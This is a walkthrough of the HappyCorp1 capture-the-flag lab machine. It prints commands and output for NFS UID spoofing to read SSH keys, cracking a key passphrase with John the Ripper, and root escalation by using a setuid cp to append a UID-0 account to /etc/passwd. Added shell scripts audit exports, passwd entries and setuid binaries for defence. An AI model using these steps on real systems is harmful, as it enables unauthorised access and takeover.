Happycorp1

Summary on the cover page

Note: to repair the machine's networking:
log into the machine and reconfigure the network
https://www.shellhacks.com/how-to-grant-root-access-user-root-privileges-linux/

1) Enumeration




  • Scan the network:
    ip a |grep global
    nmap -sn 192.168.56.1/24 -T3
    jejo@em50l:~$ ip a |grep global
        inet 192.168.56.1/24 brd 192.168.56.255 scope global vboxnet0
    
    jejo@em50l:~$ nmap -sn 192.168.56.1/24 -T3
    
    Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:16 CET
    
    Nmap scan report for 192.168.56.101
    Host is up (0.0017s latency).
    



  • Scan the IP of the machine to pentest:
    nmap -nT3 192.168.56.101
    jejo@em50l:~$ nmap -nT3 192.168.56.101 
    
    Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:32 CET
    Nmap scan report for 192.168.56.101
    Host is up (0.0030s latency).
    Not shown: 996 closed ports
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    111/tcp  open  rpcbind
    2049/tcp open  nfs
    
    



  • HTTP scan: nmap -n 192.168.56.101 -p 80 -script *http*
    jejo@em50l:~$ nmap -n 192.168.56.101 -p 80 -script *http*
    
    Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:41 CET
    Nmap scan report for 192.168.56.101
    Host is up (0.00041s latency).
    
    PORT   STATE SERVICE
    80/tcp open  http
    | http-enum: 
    |   /admin.php: Possible admin folder
    |   /robots.txt: Robots file
    |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.25'
    |   /img/: Potentially interesting directory w/ listing on 'apache/2.4.25'
    |   /js/: Potentially interesting directory w/ listing on 'apache/2.4.25'
    |   /lib/: Potentially interesting directory w/ listing on 'apache/2.4.25'
    |_  /manual/: Potentially interesting folder
    
    Nmap done: 1 IP address (1 host up) scanned in 1.47 seconds
    
    



  • Let's take a look at the web site (http):
    (screenshot: happycorp1.jpg)



  • Let's take a look at the NFS share:
    root@kali:~# showmount -e 192.168.56.101
    Export list for 192.168.56.101:
    /home/karl *
    
    root@kali:~# mkdir /mnt/nfs
    root@kali:~# sudo mount -t nfs 192.168.56.101:/home/karl /mnt/nfs
    root@kali:~# ls -lha /mnt/nfs/
    total 28K
    drwxr-xr-x 3 1001 1001 4.0K Mar  5  2019 .
    drwxr-xr-x 3 root root 4.0K Oct 30 17:36 ..
    lrwxrwxrwx 1 root root    9 Mar  5  2019 .bash_history -> /dev/null
    -rw-r--r-- 1 1001 1001  220 Mar  4  2019 .bash_logout
    -rw-r--r-- 1 1001 1001 3.5K Mar  5  2019 .bashrc
    -rw------- 1 1001 1001   28 Mar  4  2019 .lesshst
    -rw-r--r-- 1 1001 1001  675 Mar  4  2019 .profile
    drwx------ 2 1001 1001 4.0K Mar  5  2019 .ssh
    

https://www.cyberciti.biz/faq/howto-see-shares-on-nfs-server-exported-filesystems/




  • It looks like the .ssh directory may hold something interesting.
    Let's see what it contains:
    root@kali:~# ls -lha /mnt/nfs/.ssh/
    ls: cannot open directory '/mnt/nfs/.ssh/': Permission denied
    

Permission denied (as root)????
The export applies root_squash, so the client's root is mapped to an unprivileged user, while any other UID the client presents is trusted as-is. I will have to create a user with UID 1001:
useradd --uid 1001 aux_user

    root@kali:~# useradd --uid 1001 aux_user
    root@kali:~# ls -lha /mnt/nfs/
    total 28K
    drwxr-xr-x 3 aux_user aux_user 4.0K Mar  5  2019 .
    drwxr-xr-x 3 root     root     4.0K Oct 30 17:36 ..
    lrwxrwxrwx 1 root     root        9 Mar  5  2019 .bash_history -> /dev/null
    -rw-r--r-- 1 aux_user aux_user  220 Mar  4  2019 .bash_logout
    -rw-r--r-- 1 aux_user aux_user 3.5K Mar  5  2019 .bashrc
    -rw------- 1 aux_user aux_user   28 Mar  4  2019 .lesshst
    -rw-r--r-- 1 aux_user aux_user  675 Mar  4  2019 .profile
    drwx------ 2 aux_user aux_user 4.0K Mar  5  2019 .ssh
    

Now, with the permissions of user 1001, I should be able to see the contents of .ssh. As I imagined: some access key files.

    root@kali:~# su aux_user 
    $ ls -lha /mnt/nfs/.ssh
    total 24K
    drwx------ 2 aux_user aux_user 4.0K Mar  5  2019 .
    drwxr-xr-x 3 aux_user aux_user 4.0K Mar  5  2019 ..
    -rw-r--r-- 1 aux_user aux_user  740 Mar  4  2019 authorized_keys
    -rw------- 1 aux_user aux_user 3.3K Mar  4  2019 id_rsa
    -rw-r--r-- 1 aux_user aux_user  740 Mar  4  2019 id_rsa.pub
    -rw-r--r-- 1 aux_user aux_user   18 Mar  4  2019 user.txt
    
    root@kali:~# su aux_user -c "cat  /mnt/nfs/.ssh/user.txt"
    flag1{Z29vZGJveQ}
    

First flag obtained: flag1{Z29vZGJveQ}

    root@kali:~# su aux_user -c "cat  /mnt/nfs/.ssh/authorized_keys"
    ssh-rsa AAAAB3Nza.......GVm7Q== karl@happycorp
    

OK, the user is karl

    root@kali:~# su aux_user -c "cat  /mnt/nfs/.ssh/id_rsa.pub"
    ssh-rsa AAAAB3Nza.......GVm7Q== karl@happycorp
    

And we have the private key: id_rsa
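From the defender's side, the reason root was denied but a locally created UID 1001 was not is the export's squashing policy: with only root_squash, the server trusts whatever UID the client presents. The following audit is an added example, not part of this writeup, that parses an /etc/exports file and flags wildcard clients, no_root_squash and exports without all_squash; the exports file it reads is constructed here, since the box's real one is not shown.

```shell
#!/bin/sh
# Added example: audit an /etc/exports file for the weaknesses seen in this box.
# The sample below is constructed; only its first line mirrors what showmount
# reported for the target (/home/karl exported to every host).
SAMPLE_EXPORTS='/home/karl *(rw,sync)
/srv/backup 192.168.56.0/24(rw,sync,no_root_squash)
/srv/pub 192.168.56.0/24(ro,sync,all_squash)
# comment lines and blank lines are ignored

'

# audit_exports FILE
# Prints one line per finding: "<path> <client> <FINDING>". Findings:
#   WILDCARD_CLIENT     exported to "*" (any host that can reach port 2049)
#   NO_ROOT_SQUASH      client root is honoured as root on the server
#   CLIENT_UID_TRUSTED  no all_squash, so any UID the client sets (e.g. 1001)
#                       is accepted as that local user; fix with all_squash,
#                       or with Kerberos (sec=krb5p) if per-user access is needed
audit_exports() {
    awk '
    /^[[:space:]]*(#|$)/ { next }
    {
        path = $1
        for (i = 2; i <= NF; i++) {
            host = $i; opts = ""
            if (match($i, /\(.*\)$/)) {
                host = substr($i, 1, RSTART - 1)
                opts = substr($i, RSTART + 1, RLENGTH - 2)
            }
            if (host == "*")
                printf "%s %s WILDCARD_CLIENT\n", path, host
            if (opts ~ /(^|,)no_root_squash(,|$)/)
                printf "%s %s NO_ROOT_SQUASH\n", path, host
            if (opts !~ /(^|,)all_squash(,|$)/)
                printf "%s %s CLIENT_UID_TRUSTED\n", path, host
        }
    }' "$1"
}

# Write the constructed sample to a temp file and run the audit on it
# (on a real server, point audit_exports at /etc/exports instead).
EXPORTS_FILE=$(mktemp)
printf '%s' "$SAMPLE_EXPORTS" > "$EXPORTS_FILE"
audit_exports "$EXPORTS_FILE"
```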




Let's see whether it lets us in over SSH using the key we found: ssh karl@192.168.56.101 -i /mnt/nfs/.ssh/id_rsa

$ ssh karl@192.168.56.101 -i /mnt/nfs/.ssh/id_rsa
Could not create directory '/home/aux_user/.ssh'.
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:uXiM0zLVXRQYHkhNxuTByBPb14pH1AJn6IpACByicCY.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/aux_user/.ssh/known_hosts).
Enter passphrase for key '/mnt/nfs/.ssh/id_rsa': 

Oops, a problem... I will need to find out the passphrase of the key file.

Searching a bit for "RSA PRIVATE KEY lost pass phrase" I find:
https://askubuntu.com/questions/346114/how-to-retrieve-passphrase-for-private-key

Second search: "john rip RSA PRIVATE KEY"
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c

Reading it, I see that the ssh2john command is missing (I look for it with locate *2john)

Preparation

root@kali:~# su aux_user -c "cat  /mnt/nfs/.ssh/id_rsa" > id_rsa.crack
root@kali:~# wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
root@kali:~# python ./ssh2john.py id_rsa.crack > id_rsa.crack.txt

> Useful notes/queries: `john --help` / `locate *rockyou*` / `locate john`
root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.crack.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/32])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
sheep            (id_rsa.crack)
1g 0:00:00:25 DONE (2019-11-19 17:12) 0.03897g/s 558912p/s 558912c/s 558912C/s *7¡Vamos!
Session completed
It looks like the passphrase is **`sheep`**

## Let's try the SSH connection
root@kali:~# ssh karl@192.168.56.101 -i id_rsa.crack
Enter passphrase for key 'id_rsa.crack': sheep
Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 30 18:36:40 2019 from 192.168.56.105
rbash: warning: shell level (1000) too high, resetting to 1
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: Resource temporarily unavailable
karl@happycorp:~$ 

Oops, there seems to be a problem: the login shell (rbash) runs into a fork limit and doesn't work properly.



I try an alternative shell: ssh karl@192.168.56.101 -i id_rsa.crack -t /bin/sh

root@kali:~# ssh karl@192.168.56.101 -i id_rsa.crack -t /bin/sh
Enter passphrase for key 'id_rsa.crack': 
$ 
$ whoami
karl
$ 



Privilege escalation: Enumeration


  • Enumeration (from the shell): operating system and kernel version
    • uname -a / cat /etc/*release
      $ uname -a
      Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
      $ cat /etc/*release
      PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
      
    • Search for exploits for the OS and kernel: searchsploit Debian 4.9
      root@kali:~# searchsploit Debian 4.9
      Exploits: No Result
      Shellcodes: No Result
      
      No results.

Another way: auto_searchsploit.py

root@kali:~# wget https://raw.githubusercontent.com/ngalongc/AutoLocalPrivilegeEscalation/master/auto_priv_exploit.sh
root@kali:~# bash auto_priv_exploit.sh 4.9
[*] Possible Exploit

No possible exploit. Please use another version.

root@kali:~# python auto_searchsploit.py 4.9
[-] No potential exploit found. Aborting...


  • Enumeration: LinEnum.sh
      I download LinEnum and copy the file to the target machine
      root@kali:~# scp -i id_rsa.crack ./LinEnum.sh karl@192.168.56.101:/tmp
      Enter passphrase for key 'id_rsa.crack': 
      LinEnum.sh                           100%   45KB   4.0MB/s   00:00
      


      Too much information (I'll filter it a bit)
      -e [+] It looks like we have password hashes in /etc/passwd!
      toor:$1$toor$2SrtV0M1RHrAj9uQL5C7w/:0:0:root:/root:/bin/bash
      
      -e [-] Available shells:
      # /etc/shells: valid login shells
      /bin/sh
      /bin/dash
      /bin/bash
      /bin/rbash
      
      -e ### INTERESTING FILES ####################################
      -e [-] Useful file locations:
      /bin/nc
      /bin/netcat
      /usr/bin/wget
      /usr/bin/gcc
      
      -e [-] Installed compilers:
      ii  gcc                           4:6.3.0-4                      amd64        GNU C compiler
      ii  gcc-6                         6.3.0-18+deb9u1                amd64        GNU C compiler
      
      -e [+] Possibly interesting SUID files:
      -rwsr-xr-x 1 root root 130504 Feb 22  2017 /bin/cp
      -e 
      

!!!cp command with root privileges (setuid root)!!!

Let's see whether it's exploitable:
https://gtfobins.github.io/gtfobins/cp/



  • Enumeration: LinuxSmartEnumeration lse.sh
      Although we have already enumerated, I'll leave this option here
      root@kali:~# wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh"
      root@kali:~# scp -i id_rsa.crack ./lse.sh  karl@192.168.56.101:/tmp
      Enter passphrase for key 'id_rsa.crack': 
      lse.sh                                   100%   31KB   1.6MB/s   00:00    
      
      root@kali:~# ssh karl@192.168.56.101 -i id_rsa.crack -t /bin/bash /tmp/lse.sh 
      Enter passphrase for key 'id_rsa.crack': 
      ---
      
              User: karl
           User ID: 1001
          Password: none
              Home: /home/karl
              Path: /usr/local/bin:/usr/bin:/bin:/usr/games
             umask: 0022
      
          Hostname: happycorp
             Linux: 4.9.0-8-amd64
      Distribution: Debian GNU/Linux 9.8 (stretch)
      Architecture: x86_64
      
      ==================================================================( users )=====
      [i] usr000 Current user groups............................................. yes!
      [*] usr010 Is current user in an administrative group?..................... nope
      [*] usr020 Are there other users in an administrative groups?.............. nope
      [*] usr030 Other users with shell.......................................... yes!
      [i] usr040 Environment information......................................... skip
      [i] usr050 Groups for other users.......................................... skip
      [i] usr060 Other users..................................................... skip
      ===================================================================( sudo )=====
      [!] sud000 Can we sudo without a password?................................. nope
      [!] sud010 Can we list sudo commands without a password?................... nope
      [*] sud040 Can we read /etc/sudoers?....................................... nope
      [*] sud050 Do we know if any other users used sudo?........................ nope
      ============================================================( file system )=====
      [*] fst000 Writable files outside user's home.............................. yes!
      [*] fst010 Binaries with setuid bit........................................ yes!
      [!] fst020 Uncommon setuid binaries........................................ yes!
      ---
      /bin/cp
      ---
      [!] fst030 Can we write to any setuid binary?.............................. nope
      [*] fst040 Binaries with setgid bit........................................ skip
      [!] fst050 Uncommon setgid binaries........................................ skip
      [!] fst060 Can we write to any setgid binary?.............................. skip
      [*] fst070 Can we read /root?.............................................. nope
      [*] fst080 Can we read subdirectories under /home?......................... nope
      [*] fst090 SSH files in home directories................................... yes!
      [*] fst100 Useful binaries................................................. yes!
      [*] fst110 Other interesting files in home directories..................... nope
      [!] fst120 Are there any credentials in fstab/mtab?........................ nope
      [*] fst130 Does 'karl' have mail?.......................................... nope
      [!] fst140 Can we access other users mail?................................. nope
      [*] fst150 Looking for GIT/SVN repositories................................ nope
      [!] fst160 Can we write to critical files?................................. nope
      [i] fst500 Files owned by user 'karl'...................................... skip
      [i] fst510 SSH files anywhere.............................................. skip
      [i] fst520 Check hosts.equiv file and its contents......................... skip
      [i] fst530 List NFS server shares.......................................... skip
      [i] fst540 Dump fstab file................................................. skip
      =================================================================( system )=====
      [i] sys000 Who is logged in................................................ skip
      [i] sys010 Last logged in users............................................ skip
      [!] sys020 Does the /etc/passwd have hashes?............................... yes!
      ---
      toor:$1$toor$2SrtV0M1RHrAj9uQL5C7w/:0:0:root:/root:/bin/bash
      ---
      [!] sys030 Can we read /etc/shadow file?................................... nope
      [!] sys030 Can we read /etc/shadow- file?.................................. nope
      [!] sys030 Can we read /etc/shadow~ file?.................................. nope
      [!] sys030 Can we read /etc/master.passwd file?............................ nope
      [*] sys040 Check for other superuser accounts.............................. yes!
      [*] sys050 Can root user log in via SSH?................................... nope
      [i] sys060 List available shells........................................... skip
      [i] sys070 System umask in /etc/login.defs................................. skip
      [i] sys080 System password policies in /etc/login.defs..................... skip
      ===============================================================( security )=====
      [*] sec000 Is SELinux present?............................................. nope
      [*] sec010 List files with capabilities.................................... nope
      [!] sec020 Can we write to a binary with caps?............................. nope
      [!] sec030 Do we have all caps in any binary?.............................. nope
      [*] sec040 Users with associated capabilities.............................. nope
      [!] sec050 Does current user have capabilities?............................ skip
      ========================================================( recurrent tasks )=====
      [*] ret000 User crontab.................................................... nope
      [!] ret010 Cron tasks writable by user..................................... nope
      [*] ret020 Cron jobs....................................................... yes!
      [*] ret030 Can we read user crontabs....................................... nope
      [*] ret040 Can we list other user cron tasks?.............................. nope
      [!] ret050 Can we write to executable paths present in cron jobs........... nope
      [*] ret060 Can we write to any paths present in cron jobs.................. nope
      [i] ret400 Cron files...................................................... skip
      [*] ret500 User systemd timers............................................. nope
      [!] ret510 Can we write in any system timer?............................... nope
      [i] ret900 Systemd timers.................................................. skip
      ================================================================( network )=====
      [*] net000 Services listening only on localhost............................ nope
      [!] net010 Can we sniff traffic with tcpdump?.............................. nope
      [i] net500 NIC and IP information.......................................... skip
      [i] net510 Routing table................................................... skip
      [i] net520 ARP table....................................................... skip
      [i] net530 Namerservers.................................................... skip
      [i] net540 Systemd Nameservers............................................. skip
      [i] net550 Listening TCP................................................... skip
      [i] net560 Listening UDP................................................... skip
      ===============================================================( services )=====
      [!] srv000 Can we write in service files?.................................. nope
      [!] srv010 Can we write in binaries executed by services?.................. nope
      [*] srv020 Files in /etc/init.d/ not belonging to root..................... nope
      [*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope
      [*] srv040 Upstart files not belonging to root............................. nope
      [*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope
      [i] srv400 Contents of /etc/inetd.conf..................................... skip
      [i] srv410 Contents of /etc/xinetd.conf.................................... skip
      [i] srv420 List /etc/xinetd.d if used...................................... skip
      [i] srv430 List /etc/init.d/ permissions................................... skip
      [i] srv440 List /etc/rc.d/init.d permissions............................... skip
      [i] srv450 List /usr/local/etc/rc.d permissions............................ skip
      [i] srv460 List /etc/init/ permissions..................................... skip
      [!] srv500 Can we write in systemd service files?.......................... nope
      [!] srv510 Can we write in binaries executed by systemd services?.......... nope
      [*] srv520 Systemd files not belonging to root............................. nope
      [i] srv900 Systemd config files permissions................................ skip
      ==============================================================( processes )=====
      [!] pro000 Can we write in any process binary?............................. nope
      [*] pro010 Processes running with root permissions......................... yes!
      [i] pro500 Running processes............................................... skip
      [i] pro510 Running process binaries and permissions........................ skip
      ===============================================================( software )=====
      [!] sof000 Can we connect to MySQL with root/root credentials?............. nope
      [!] sof010 Can we connect to MySQL as root without password?............... nope
      [!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope
      [!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope
      [!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope
      [!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope
      [*] sof030 Installed apache modules........................................ yes!
      [!] sof040 Found any .htpasswd files?...................................... nope
      [i] sof500 Sudo version.................................................... skip
      [i] sof510 MySQL version................................................... skip
      [i] sof520 Postgres version................................................ skip
      [i] sof530 Apache version.................................................. skip
      =============================================================( containers )=====
      [*] ctn000 Are we in a docker container?................................... nope
      [*] ctn010 Is docker available?............................................ nope
      [!] ctn020 Is the user a member of the 'docker' group?..................... nope
      [*] ctn200 Are we in a lxc container?...................................... nope
      [!] ctn210 Is the user a member of any lxc/lxd group?...................... nope
      
      ==================================( FINISHED )==================================
      Connection to 192.168.56.101 closed.
      
      Noteworthy:
      [!] fst020 Uncommon setuid binaries........................................ yes!
      ---
      /bin/cp
      ---
      





Privilege escalation: Exploiting the vulnerabilities found.

https://gtfobins.github.io/gtfobins/cp/

The strategy would be:

  • Generate a passwd line:
    Based on the root line in /etc/passwd, I generate a similar line with a password hash in place of `:x:`
    root@kali:~# cat /etc/passwd | grep root
    root:x:0:0:root:/root:/bin/bash
    root@kali:~# openssl passwd -1 -salt jejo jejo
    $1$jejo$4.S4N2nsF5I9dhmE1iqLD/
    root@kali:~# echo 'jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash'
    jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash
    
  • Copy /etc/passwd to a temporary path (so I get write permission on the copy):
    cp /etc/passwd /tmp/passwd

  • Append the generated line to the passwd file

    $ echo 'jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash' >> /tmp/passwd
    /bin/sh: 13: cannot create /tmp/passwd: Permission denied
    
    Oops, it won't let me: /tmp/passwd was created by the setuid cp, so it belongs to root. So I add the line with nano and save it as passwd2.
  • Copy the modified passwd file back to its original path
      $ cp /tmp/passwd2 /etc/passwd
      $ tail -2 /etc/passwd
      statd:x:107:65534::/var/lib/nfs:/bin/false
      jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash


ROOT obtained

$ su jejo
Password: 
root@happycorp:/tmp# whoami
root


Here is the flag
root@happycorp:~# cat /root/root.txt
Congrats!
flag2{aGFja2VyZ29k}
Here is some useless ascii art :)
           ,----------------,              ,---------,
        ,-----------------------,          ,"        ,"|
      ,"                      ,"|        ,"        ,"  |
     +-----------------------+  |      ,"        ,"    |
     |  .-----------------.  |  |     +---------+      |
     |  |                 |  |  |     | -==----'|      |
     |  |                 |  |  |     |         |      |
     |  |  Hacker God     |  |  |/----|`---=    |      |
     |  |  C:\>_          |  |  |   ,/|==== ooo |      ;
     |  |                 |  |  |  // |(((( [33]|    ,"
     |  `-----------------'  |," .;'| |((((     |  ,"
     +-----------------------+  ;;  | |         |,"
        /_)______________(_/  //'   | +---------+
   ___________________________/___  `,
  /  oooooooooooooooo  .o.  oooo /,   \,"-----------
 / ==ooooooooooooooo==.o.  ooo= //   ,`\--{)B     ,"
/_==__==========__==_ooo__ooo=_/'   /___________,"


 -Zayotic
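From a defender's stance, both findings this walkthrough relied on (a second UID-0 account with its hash sitting in the world-readable /etc/passwd, and cp carrying the setuid bit) are cheap to detect. This audit script is an added example, not part of the original writeup: its passwd sample reuses the toor and jejo lines shown above, and the setuid baseline is an assumed known-good list, not one taken from the box.

```shell
#!/bin/sh
# Added example: detect the two conditions this box relied on.
# 1) /etc/passwd entries with UID 0 besides root, or with a hash in the
#    password field (readable by everyone, so crackable offline; it should be "x").
# 2) setuid binaries that are not in a known-good baseline (here: /bin/cp).

# Constructed passwd sample: the toor and jejo lines are the ones shown in this
# walkthrough; the rest are ordinary Debian entries.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:$1$toor$2SrtV0M1RHrAj9uQL5C7w/:0:0:root:/root:/bin/bash
karl:x:1001:1001:,,,:/home/karl:/bin/rbash
statd:x:107:65534::/var/lib/nfs:/bin/false
jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash
'

# audit_passwd FILE: print "<FINDING> <user>" for each suspicious entry.
audit_passwd() {
    awk -F: '
    NF != 7                 { printf "BAD_FIELDS %s\n", $1; next }
    $3 == "0" && $1 != "root" { printf "EXTRA_UID0 %s\n", $1 }
    $2 == ""                { printf "EMPTY_PASSWORD %s\n", $1 }
    $2 != "" && $2 != "x" && $2 != "*" && $2 !~ /^!/ { printf "HASH_IN_PASSWD %s\n", $1 }
    ' "$1"
}

# Constructed setuid lists: an assumed known-good baseline for a minimal
# Debian 9 install versus what the target reports. Generate real ones with:
#   find / -xdev -type f -perm -4000 2>/dev/null | sort
SUID_BASELINE='/bin/mount
/bin/ping
/bin/su
/bin/umount
/usr/bin/passwd
'
SUID_CURRENT='/bin/cp
/bin/mount
/bin/ping
/bin/su
/bin/umount
/usr/bin/passwd
'

# suid_added BASELINE_FILE CURRENT_FILE: print setuid binaries absent from the
# baseline (both files must be sorted, as comm requires).
suid_added() {
    comm -13 "$1" "$2"
}

PASSWD_FILE=$(mktemp); printf '%s' "$SAMPLE_PASSWD" > "$PASSWD_FILE"
BASE_FILE=$(mktemp);   printf '%s' "$SUID_BASELINE" > "$BASE_FILE"
CUR_FILE=$(mktemp);    printf '%s' "$SUID_CURRENT"  > "$CUR_FILE"

echo "== passwd findings =="
audit_passwd "$PASSWD_FILE"
echo "== setuid binaries not in baseline =="
suid_added "$BASE_FILE" "$CUR_FILE"
```

On a live host, run audit_passwd against /etc/passwd and keep the setuid baseline under change control so that a newly appearing /bin/cp stands out.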



References

https://www.hackingarticles.in/happycorp1-vulnhub-walkthrough/

https://www.hackingarticles.in/beginners-guide-for-john-the-ripper-part-2/
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://gtfobins.github.io/gtfobins/cp/

To investigate:
https://www.shellhacks.com/linux-generate-password-hash/
https://www.hackplayers.com/2016/12/automatizando-el-escalado-de.html
https://github.com/ngalongc/AutoLocalPrivilegeEscalation